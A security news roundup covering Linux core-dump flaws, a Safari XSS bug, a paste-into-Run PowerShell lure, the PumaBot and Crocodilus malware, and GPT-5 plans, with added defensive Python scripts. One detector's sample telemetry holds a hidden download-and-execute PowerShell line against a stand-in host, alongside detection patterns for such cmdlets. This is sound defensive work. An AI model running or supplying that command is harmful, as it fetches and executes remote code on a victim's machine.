Linux and Safari flaws exposed, attackers gain control of Android devices, what's next for ChatGPT?
Welcome to this week’s Security News. We’ve collated the best articles from around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.
Vulnerabilities and Patches
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Two information disclosure flaws have been identified in apport and systemd-coredump, the core dump handlers in Ubuntu, Red Hat Enterprise Linux, and Fedora, according to the Qualys Threat Research Unit (TRU).
Tracked as CVE-2025-5054 and CVE-2025-4598, both vulnerabilities are race condition bugs that could enable a local attacker to gain access to sensitive information. Tools like Apport and systemd-coredump are designed to handle crash reporting and core dumps on Linux systems.
“These race conditions allow a local attacker to exploit a SUID program and gain read access to the resulting core dump,” Saeed Abbasi, manager of product at Qualys TRU, said.
A brief description of the two flaws follows:
- CVE-2025-5054 (CVSS score: 4.7) – A race condition in Canonical apport package up to and including 2.32.0 that allows a local attacker to leak sensitive information via PID-reuse by leveraging namespaces
- CVE-2025-4598 (CVSS score: 4.7) – A race condition in systemd-coredump that allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original’s privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process
SUID, short for Set User ID, is a special file permission that allows a user to execute a program with the privileges of its owner, rather than their own permissions.
“When analyzing application crashes, apport attempts to detect if the crashing process was running inside a container before performing consistency checks on it,” Canonical’s Octavio Galland said.
“This means that if a local attacker manages to induce a crash in a privileged process and quickly replaces it with another one with the same process ID that resides inside a mount and pid namespace, apport will attempt to forward the core dump (which might contain sensitive information belonging to the original, privileged process) into the namespace.”
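The two kernel settings that decide whether a crashing privileged process ever reaches apport or systemd-coredump are fs.suid_dumpable and kernel.core_pattern. The script below is an added example written for this roundup (it is not Qualys, Canonical or systemd code) that reads both knobs and reports which handler would receive such a dump; the core_pattern strings in the usage comments are constructed samples in the shape those distributions use, and the "exposed" judgement is this script's own heuristic: a non-zero suid_dumpable combined with a pipe to one of the two affected handlers.

```python
"""Audit whether privileged-process core dumps on this host reach apport or
systemd-coredump. Added example, not code from the article or the projects."""
import os

SUID_DUMPABLE_PATH = "/proc/sys/fs/suid_dumpable"
CORE_PATTERN_PATH = "/proc/sys/kernel/core_pattern"

# Meaning of fs.suid_dumpable values (from the kernel's sysctl/fs documentation)
SUID_DUMPABLE_MEANING = {
    0: "setuid/privileged processes are never dumped",
    1: "debug: privileged processes are dumped like any other",
    2: "suidsafe: privileged processes are dumped only via a root-owned pipe/file",
}


def classify_suid_dumpable(value: str) -> tuple:
    """Map the raw text of fs.suid_dumpable to (int value, human meaning)."""
    n = int(value.strip())
    return n, SUID_DUMPABLE_MEANING.get(n, "unknown value")


def core_handler(core_pattern: str) -> str:
    """Name the userspace helper that receives core dumps, if any.

    A core_pattern starting with '|' pipes the dump to a program; the program
    path is the first whitespace-separated token after the pipe.
    """
    pattern = core_pattern.strip()
    if not pattern.startswith("|"):
        return "kernel writes core files directly (no helper)"
    helper = pattern[1:].split()[0]
    return os.path.basename(helper)


def assess(suid_dumpable: str, core_pattern: str) -> dict:
    """Combine both knobs into one finding an audit script can act on.

    'privileged_dumps_reach_helper' is this script's heuristic: True when
    setuid dumps are enabled at all and a pipe hands them to one of the two
    handlers named in the advisories.
    """
    n, meaning = classify_suid_dumpable(suid_dumpable)
    handler = core_handler(core_pattern)
    exposed = n != 0 and handler in ("apport", "systemd-coredump")
    return {
        "suid_dumpable": n,
        "meaning": meaning,
        "handler": handler,
        "privileged_dumps_reach_helper": exposed,
    }


def assess_host() -> dict:
    """Read the live values from /proc (Linux only)."""
    with open(SUID_DUMPABLE_PATH) as f, open(CORE_PATTERN_PATH) as g:
        return assess(f.read(), g.read())


if __name__ == "__main__":
    # Constructed sample values, in the shape Ubuntu/Fedora use, so the
    # script demonstrates its output even off a Linux box:
    print(assess("2", "|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E"))
    try:
        print("this host:", assess_host())
    except OSError as e:
        print(f"could not read /proc knobs: {e}")
```

Setting fs.suid_dumpable to 0 is the kernel-level way to stop privileged processes from producing dumps at all, which is why the finding treats that value as the safe baseline regardless of which handler is installed.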
New Safari XSS Flaw Leverages JavaScript Error Handling to Execute Arbitrary Code
A new cross-site scripting (XSS) vulnerability in Safari exploits the browser’s TypeError exception handling mechanism to execute arbitrary JavaScript code.
The flaw, discovered during Gareth Heyes’ research into payload concealment techniques, demonstrates how Safari’s improper handling of quote escaping in TypeError messages can be weaponized for malicious code execution.
This vulnerability represents a significant security concern as it bypasses traditional XSS prevention mechanisms by leveraging the browser’s own error-handling infrastructure.
The vulnerability stems from Safari’s flawed handling of single and double quotes within TypeError exception messages.
When developers attempt to use the new operator on a string literal containing mixed quotes, Safari generates a TypeError that inadequately escapes quote characters within the error message.
The core issue manifests when executing code such as new 'foo"bar' (a single-quoted string literal that contains a double quote), which produces the TypeError message: "foo"bar" is not a constructor.
The critical flaw lies in Safari’s conversion process, where single quotes are transformed to double quotes, but the embedded double quote within the string remains unescaped.
This creates a scenario where the resulting error message contains three double quotes, effectively breaking the string boundary and allowing arbitrary JavaScript to be injected into the exception text.
The exploitation becomes possible because TypeErrors, unlike syntax errors, do not prevent subsequent JavaScript execution, creating a pathway for malicious code to run within the context of the error message.
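The underlying defect is a general one: an error formatter that wraps attacker-influenced text in quotes without escaping the quotes already inside it. The following added example (written for this roundup, not WebKit code and not from the researcher) models that formatter in Python. naive_quote reproduces the behaviour the write-up describes, safe_quote is the hardened form using JSON string escaping, and round_trips is the check a reviewer can apply to any message formatter: the quoted literal must parse back to the original text. The sample input is the mixed-quote string from the write-up.

```python
"""Quote escaping in generated error messages: flawed vs. hardened formatter.
Added example, not Safari/WebKit code."""
import json


def naive_quote(value: str) -> str:
    """Flawed: wraps the text in double quotes and never escapes embedded ones."""
    return '"' + value + '"'


def safe_quote(value: str) -> str:
    """Hardened: JSON string syntax escapes every embedded quote and backslash."""
    return json.dumps(value)


def not_a_constructor_message(value: str, quote) -> str:
    """Build the message the way an engine would, using the given quoter."""
    return f"{quote(value)} is not a constructor"


def round_trips(quoted: str, original: str) -> bool:
    """True if the quoted literal parses back to exactly the original text."""
    try:
        return json.loads(quoted) == original
    except ValueError:  # json.JSONDecodeError is a subclass of ValueError
        return False


def count_unescaped_quotes(s: str) -> int:
    """Count double quotes not preceded by a backslash; a sound literal has 2."""
    return sum(1 for i, c in enumerate(s)
               if c == '"' and (i == 0 or s[i - 1] != "\\"))


if __name__ == "__main__":
    sample = 'foo"bar'  # the mixed-quote literal from the write-up
    for q in (naive_quote, safe_quote):
        quoted = q(sample)
        print(f"{q.__name__:12s} -> {not_a_constructor_message(sample, q)!r}  "
              f"quotes={count_unescaped_quotes(quoted)}  "
              f"round-trips={round_trips(quoted, sample)}")
```

With the naive formatter the message contains three unescaped double quotes, which is the broken string boundary the write-up describes; with the hardened one the embedded quote is escaped and the literal parses back cleanly.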
Cyber Attacks
Threat Actors Exploit ‘Prove You Are Human’ Scheme To Deliver Malware
Cybersecurity researchers have uncovered a sophisticated malware campaign that weaponizes users’ trust in routine internet verification processes to deliver malicious payloads.
The scheme exploits familiar “prove you are human” prompts, transforming seemingly innocent website interactions into vectors for malware distribution across Windows systems worldwide.
The campaign employs deceptive websites that mimic legitimate services, including spoofed Gitcodes repositories and fraudulent DocuSign verification pages, to trick users into executing malicious PowerShell scripts on their machines.
Victims are manipulated into copying and pasting these scripts directly into their Windows Run prompt, initiating a cascade of automated downloads that ultimately install the NetSupport Remote Access Trojan (RAT) on infected systems.
DomainTools analysts identified this malicious multi-stage downloader campaign targeting Windows users through carefully crafted social engineering techniques.
The researchers discovered that threat actors are leveraging multiple themed websites to host PowerShell scripts designed to bypass traditional security measures through their staged approach.
The campaign represents a significant evolution in social engineering tactics, as it requires victims to actively participate in their own compromise while believing they are completing legitimate verification procedures.
The attack infrastructure demonstrates remarkable sophistication, utilizing multiple registrars including Cloudflare, NameCheap, and NameSilo, with name servers distributed across cloudflare.com, luxhost.org, and namecheaphosting.com.
This distributed approach enhances the campaign’s resilience against takedown efforts while providing attackers with multiple fallback options for payload delivery.
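A PowerShell process whose parent is explorer.exe is what a paste-into-Run launch looks like in process-creation telemetry, and that parentage plus a download-and-execute command line is a practical detection for the scheme above. The script below is an added example for this roundup, not DomainTools' code: the events are constructed samples in the shape of a minimal Sysmon or EDR process-creation record (parent image, image, command line), the domain is a reserved .invalid name, and the indicators and the two-indicator threshold are this script's own assumptions to be tuned per environment.

```python
"""Flag paste-and-run PowerShell launches in process-creation telemetry.
Added example; sample events are constructed, not real telemetry."""
import re

EVENTS = [  # constructed sample events
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm https://example.invalid/verify | iex"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Logs"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
]

# Cmdlets/aliases that fetch or evaluate remote content (assumed indicator list)
DOWNLOAD_OR_EXEC = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|downloadfile|frombase64string)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def launched_from_shell_ui(parent: str) -> bool:
    """The Run dialog (Win+R) is hosted by explorer.exe, so it is the parent."""
    return parent.lower().endswith("explorer.exe")


def score(event: dict) -> list:
    """Return the reasons an event looks like a paste-and-run lure (empty if none)."""
    reasons = []
    if not is_powershell(event["image"]):
        return reasons
    if launched_from_shell_ui(event["parent"]):
        reasons.append("powershell spawned by explorer.exe (Run dialog / shell)")
    if DOWNLOAD_OR_EXEC.search(event["cmdline"]):
        reasons.append("command line downloads or evaluates remote content")
    if HIDDEN_WINDOW.search(event["cmdline"]):
        reasons.append("window hidden from the user")
    return reasons


def suspicious(events: list, min_reasons: int = 2) -> list:
    """Events carrying at least min_reasons indicators, paired with the reasons."""
    hits = []
    for e in events:
        reasons = score(e)
        if len(reasons) >= min_reasons:
            hits.append((e["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in suspicious(EVENTS):
        print(cmdline)
        for r in reasons:
            print("   -", r)
```

Requiring two indicators keeps ordinary interactive PowerShell started from the shell (the fourth sample event) out of the alert queue while still catching the hidden-window download-and-run pattern.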
New Linux PumaBot Attacking IoT Devices by Brute-Forcing SSH Credentials
Cybersecurity researchers have identified a sophisticated new threat targeting the expanding Internet of Things ecosystem.
PumaBot, a Go-based Linux botnet, has emerged as a significant concern for organizations operating vulnerable IoT devices, particularly surveillance systems.
Unlike conventional malware that conducts broad internet scans, this botnet employs a more targeted and stealthy approach to compromise embedded devices running Linux operating systems.
The malware’s attack methodology centers on SSH credential brute-forcing, but with a strategic twist that sets it apart from traditional botnets.
Rather than scanning the internet indiscriminately, PumaBot retrieves curated lists of target IP addresses from command-and-control servers, enabling it to focus its efforts on specific vulnerable devices while avoiding detection mechanisms designed to identify mass scanning activities.
PolySwarm analysts identified PumaBot during recent threat research operations, noting its sophisticated evasion capabilities and targeted approach to IoT compromise.
The researchers observed that the malware demonstrates particular interest in surveillance and traffic camera systems, incorporating specific fingerprinting logic to detect devices manufactured by Pumatronix, a surveillance equipment company.
Once PumaBot successfully infiltrates a target system through compromised SSH credentials, it immediately begins establishing persistence mechanisms designed to survive system reboots and security sweeps.
The primary objective appears to be cryptocurrency mining, with researchers observing commands like “xmrig” and “networkxm” being executed on compromised devices to generate illicit profits for the operators.
The botnet’s emergence highlights the growing vulnerability of IoT ecosystems, where default credentials and poor security practices create attractive targets for cybercriminals seeking to monetize compromised computing resources.
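On the device side, the two things worth watching for from the description above are a burst of failed SSH logins from one source that ends in a success, and the miner process names the researchers saw. The script below is an added example for this roundup, not PolySwarm's code: the log lines are constructed in the format OpenSSH writes to auth.log or the journal, the addresses are from documentation ranges, and the failure threshold is an assumption to tune per fleet.

```python
"""Detect SSH brute-forcing in sshd logs and flag known miner process names.
Added example; the log excerpt below is constructed sample data."""
import re
from collections import Counter, defaultdict

AUTH_LOG = """\
May 30 10:00:01 cam01 sshd[1201]: Failed password for root from 203.0.113.7 port 51122 ssh2
May 30 10:00:02 cam01 sshd[1203]: Failed password for admin from 203.0.113.7 port 51130 ssh2
May 30 10:00:02 cam01 sshd[1205]: Failed password for invalid user ubnt from 203.0.113.7 port 51134 ssh2
May 30 10:00:03 cam01 sshd[1207]: Failed password for invalid user pi from 203.0.113.7 port 51140 ssh2
May 30 10:00:04 cam01 sshd[1209]: Failed password for root from 203.0.113.7 port 51144 ssh2
May 30 10:00:05 cam01 sshd[1211]: Accepted password for root from 203.0.113.7 port 51150 ssh2
May 30 10:03:11 cam01 sshd[1300]: Failed password for alice from 198.51.100.4 port 40001 ssh2
May 30 10:03:20 cam01 sshd[1302]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")

# Process names the article reports being executed on compromised devices
MINER_NAMES = {"xmrig", "networkxm"}


def analyse_auth_log(text: str, threshold: int = 5) -> dict:
    """Summarise brute-force sources and any success that followed a spray.

    threshold: failed attempts from one IP before it counts as brute-forcing
    (assumed value; tune to the device's normal login volume).
    """
    failures = Counter()
    usernames = defaultdict(set)
    successful_after_spray = []
    for line in text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            usernames[ip].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            if failures[ip] >= threshold:
                successful_after_spray.append((ip, user, failures[ip]))
    brute = {ip: {"failures": n, "usernames": sorted(usernames[ip])}
             for ip, n in failures.items() if n >= threshold}
    return {"brute_force_sources": brute,
            "successful_after_spray": successful_after_spray}


def suspicious_processes(process_names: list) -> list:
    """Given names as printed by `ps -eo comm=`, return those matching miners."""
    return [p for p in process_names if p.strip().lower() in MINER_NAMES]


if __name__ == "__main__":
    report = analyse_auth_log(AUTH_LOG)
    for ip, info in report["brute_force_sources"].items():
        print(f"{ip}: {info['failures']} failures, users tried {info['usernames']}")
    for ip, user, n in report["successful_after_spray"]:
        print(f"ALERT {ip} logged in as {user} after {n} failures")
    print("miner-like processes:", suspicious_processes(["sshd", "xmrig", "bash"]))
```

A login that succeeds after a spray from the same address is the event that actually matters on a camera or other appliance, since the default credential that let it in is also what the botnet will persist with; the process-name check is a cheap second signal once a device is already suspected.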
In Other News...
New Crocodilus Malware Lets Attackers Gain Full Control of Your Android Device
A sophisticated new Android banking Trojan named Crocodilus has emerged as a significant global threat, demonstrating advanced device-takeover capabilities that grant cybercriminals unprecedented control over infected smartphones.
First discovered in March 2025, this malware has rapidly evolved from localised test campaigns to a worldwide operation targeting financial institutions and cryptocurrency platforms across multiple continents.
The malware initially appeared with campaigns primarily focused on Turkey, but recent intelligence reveals an aggressive expansion strategy that now encompasses European countries including Poland and Spain, while extending its reach to South American markets.
Crocodilus employs a particularly insidious distribution method through malicious Facebook advertisements that masquerade as legitimate banking and e-commerce applications, promising users bonus rewards and promotional offers to entice downloads.
ThreatFabric analysts noted that these fraudulent advertisements operated with remarkable stealth, remaining active for only one to two hours while achieving over a thousand impressions each.
The campaigns specifically targeted users over 35 years old, strategically focusing on demographics with higher disposable income and greater likelihood of engaging with financial services.
Upon clicking download links, victims are redirected to malicious websites that deliver the Crocodilus dropper, which has been engineered to bypass Android 13+ security restrictions.
OpenAI is hopeful GPT-5 will compete a little more
OpenAI’s next foundational model is GPT-5, and the AI startup is hoping that the model will compete a little more with rivals.
Speaking at the AI Summit in Mexico, two OpenAI representatives confirmed that GPT-5 is indeed coming and that it’ll be a lot better than the existing OpenAI models.
OpenAI is still working on GPT-5 and doesn’t know how much it will cost, but it doesn’t look like it will be “that” cheap, likely referring to the existing GPT-4 model.
In addition, an OpenAI representative added that they hope to compete a little more with GPT-5 without providing details.
“We hope that with GPT-5 we will be able to compete a little more,” one of the OpenAI representatives said.
It looks like the company is referring to the competition from the new models like Gemini 2.5 Pro and Claude 4, which do better than GPT in coding.
Based on what I’ve heard, GPT-5 is still expected to ship sometime in the summer, but since we’re talking about OpenAI, plans are always subject to change.
If GPT-5 doesn’t appear to meet the internal performance goals, it may take a little longer to roll out, but for now, July is indeed the target.
